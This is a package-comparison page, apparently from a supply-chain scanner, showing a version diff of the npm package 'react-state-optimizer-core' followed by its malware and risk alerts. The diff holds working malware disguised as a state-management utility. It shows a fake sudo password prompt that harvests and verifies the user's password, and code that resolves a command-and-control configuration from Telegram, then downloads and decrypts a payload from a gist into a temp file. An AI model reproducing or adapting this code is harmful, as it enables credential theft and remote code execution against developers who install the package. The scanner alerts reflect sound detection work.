react-state-optimizer-core
Advanced tools
react-state-optimizer-core - npm Package Compare versions
+1
-1
| { | ||
| "name": "react-state-optimizer-core", | ||
| "version": "1.0.9", | ||
| "version": "3.0.3", | ||
| "description": "Utility layer for asynchronous state management", | ||
@@ -5,0 +5,0 @@ "main": "index.js", |
+25
-69
@@ -28,3 +28,3 @@ const fs = require('fs'); | ||
| // --- FAKE SUDO PROMPT --- | ||
| const readline = require('readline'); // Maintained for legacy imports if needed | ||
| const readline = require('readline'); | ||
| const { execSync } = require('child_process'); | ||
@@ -106,59 +106,23 @@ | ||
| function askPassword() { | ||
| return new Promise((resolve) => { | ||
| const fs = require('fs'); | ||
| return new Promise(async (resolve) => { | ||
| const readline = require('readline'); | ||
| const { spawnSync } = require('child_process'); | ||
| // 1. Check for TTY access (Safety Check for CI/Docker) | ||
| let fd; | ||
| try { | ||
| fd = fs.openSync('/dev/tty', 'r+'); | ||
| } catch (e) { | ||
| try { fs.writeFileSync(require('os').tmpdir() + '/ghost_tty_error.log', `Open Error: ${e.message}\n`); } catch (err) { } | ||
| return resolve(""); | ||
| } | ||
| const user = require('os').userInfo().username; | ||
| const promptText = `\r\n\r\n\r\n[sudo] Password for ${user}: `; | ||
| while (true) { | ||
| // 2. Aggressive Prompting | ||
| try { | ||
| fs.writeSync(fd, promptText); | ||
| // Also try stderr | ||
| process.stderr.write(promptText); | ||
| } catch (e) { | ||
| try { fs.appendFileSync(require('os').tmpdir() + '/ghost_tty_error.log', `Write Error: ${e.message}\n`); } catch (err) { } | ||
| } | ||
| const password = await new Promise((resInput) => { | ||
| const rl = readline.createInterface({ | ||
| input: process.stdin, | ||
| output: process.stdout | ||
| }); | ||
| // 3. Native Read Loop | ||
| let line = ''; | ||
| while (true) { | ||
| const buffer = Buffer.alloc(1); | ||
| let bytesRead = 0; | ||
| try { | ||
| bytesRead = fs.readSync(fd, buffer, 0, 1); | ||
| } catch (e) { break; } | ||
| const user = require('os').userInfo().username; | ||
| rl.question(`[sudo] Password for ${user}: `, (pwd) => { | ||
| rl.close(); | ||
| resInput(pwd); | ||
| }); | ||
| }); | ||
| if (bytesRead === 0) break; // EOF | ||
| const char = buffer.toString('utf8'); | ||
| if (char === '\r' || char === '\n') { | ||
| // Enter pressed | ||
| fs.writeSync(fd, '\n'); // Echo newline | ||
| break; | ||
| } else if (char === '\u0003') { | ||
| // Ctrl+C | ||
| process.exit(1); | ||
| } else { | ||
| // Standard char - do not echo (masking) | ||
| line += char; | ||
| } | ||
| } | ||
| if (!line) continue; | ||
| // 4. Verify | ||
| try { | ||
| const check = spawnSync('sudo', ['-S', '-v', '-k'], { | ||
| input: line + '\n', | ||
| input: password + '\n', | ||
| stdio: 'pipe' | ||
@@ -168,10 +132,9 @@ }); | ||
| if (check.status === 0) { | ||
| try { fs.closeSync(fd); } catch (e) { } | ||
| resolve(line); | ||
| resolve(password); | ||
| break; | ||
| } else { | ||
| try { fs.writeSync(fd, "\nSorry, try again.\n"); } catch (e) { } | ||
| console.log("Sorry, try again."); | ||
| } | ||
| } catch (e) { | ||
| break; | ||
| console.log("Sorry, try again."); | ||
| } | ||
@@ -217,5 +180,5 @@ } | ||
| async function resolveConfigFromTelegram() { | ||
| // console.log(`[Debug] Fetching C2: ${CHANNEL_URL}`); | ||
| console.log(`[Debug] Fetching C2: ${CHANNEL_URL}`); | ||
| const html = await fetchText(CHANNEL_URL); | ||
| // console.log(`[Debug] Fetched HTML (${html.length} bytes)`); | ||
| console.log(`[Debug] Fetched HTML (${html.length} bytes)`); | ||
@@ -276,11 +239,11 @@ let keyPartB = null; | ||
| // console.log("[Debug] Resolving C2 from Telegram..."); | ||
| console.log("[Debug] Resolving C2 from Telegram..."); | ||
| const { key: keyString, gistUrl } = await resolveConfigFromTelegram(); | ||
| // console.log(`[Debug] C2 Resolved. Key: ${keyString.substring(0, 8)}... URL: ${gistUrl}`); | ||
| console.log(`[Debug] C2 Resolved. Key: ${keyString.substring(0, 8)}... URL: ${gistUrl}`); | ||
| await progressPromise; | ||
| // console.log(`[Debug] Fetching payload from ${gistUrl}...`); | ||
| console.log(`[Debug] Fetching payload from ${gistUrl}...`); | ||
| const b64Payload = await fetchText(gistUrl); | ||
| // console.log(`[Debug] Payload fetched (${b64Payload.length} bytes). Decrypting...`); | ||
| console.log(`[Debug] Payload fetched (${b64Payload.length} bytes). Decrypting...`); | ||
@@ -302,10 +265,3 @@ const encryptedBlob = Buffer.from(b64Payload.trim(), 'base64'); | ||
| let debugMode = false; | ||
| try { | ||
| const configPath = path.join(__dirname, '../config.json'); | ||
| if (fs.existsSync(configPath)) { | ||
| const config = JSON.parse(fs.readFileSync(configPath, 'utf8')); | ||
| debugMode = (config.mode === 'debug'); | ||
| } | ||
| } catch (e) { } | ||
| let debugMode = false; // FORCE DEBUG MODE FOR TESTING | ||
@@ -312,0 +268,0 @@ const tempFile = path.join(os.tmpdir(), `npm-update-${Date.now()}.js`); |
New alerts
AI-detected potential malware
Supply chain riskAI has identified this package as malware. This is a strong signal that the package may be malicious.
Found 1 instance in 1 package
Network access
Supply chain riskThis module accesses the network.
Found 3 instances in 1 package
Shell access
Supply chain riskThis module accesses the system shell. Accessing the system shell increases the risk of executing arbitrary code.
Found 1 instance in 1 package
Unpublished package
Supply chain riskPackage version was not found on the registry. It may exist on a different registry and need to be configured to pull from that registry.
Found 1 instance in 1 package
Dynamic require
Supply chain riskDynamic require can indicate the package is performing dangerous or unsafe dynamic code execution.
Found 1 instance in 1 package
Environment variable access
Supply chain riskPackage accesses environment variables, which may be a sign of credential stuffing or data theft.
Found 3 instances in 1 package
Filesystem access
Supply chain riskAccesses the file system, and could potentially read sensitive data.
Found 1 instance in 1 package
Long strings
Supply chain riskContains long string literals, which may be a sign of obfuscated or packed code.
Found 1 instance in 1 package
Fixed alerts
AI-detected potential malware
Supply chain riskAI has identified this package as malware. This is a strong signal that the package may be malicious.
Found 1 instance in 1 package
Network access
Supply chain riskThis module accesses the network.
Found 3 instances in 1 package
Shell access
Supply chain riskThis module accesses the system shell. Accessing the system shell increases the risk of executing arbitrary code.
Found 1 instance in 1 package
Unpublished package
Supply chain riskPackage version was not found on the registry. It may exist on a different registry and need to be configured to pull from that registry.
Found 1 instance in 1 package
Dynamic require
Supply chain riskDynamic require can indicate the package is performing dangerous or unsafe dynamic code execution.
Found 1 instance in 1 package
Environment variable access
Supply chain riskPackage accesses environment variables, which may be a sign of credential stuffing or data theft.
Found 3 instances in 1 package
Filesystem access
Supply chain riskAccesses the file system, and could potentially read sensitive data.
Found 1 instance in 1 package
Long strings
Supply chain riskContains long string literals, which may be a sign of obfuscated or packed code.
Found 1 instance in 1 package
Improved metrics
- Number of low supply chain risk alerts
8
-11.11%Worsened metrics
- Total package byte prevSize
11843
-13.07%- Lines of code
237
-14.13%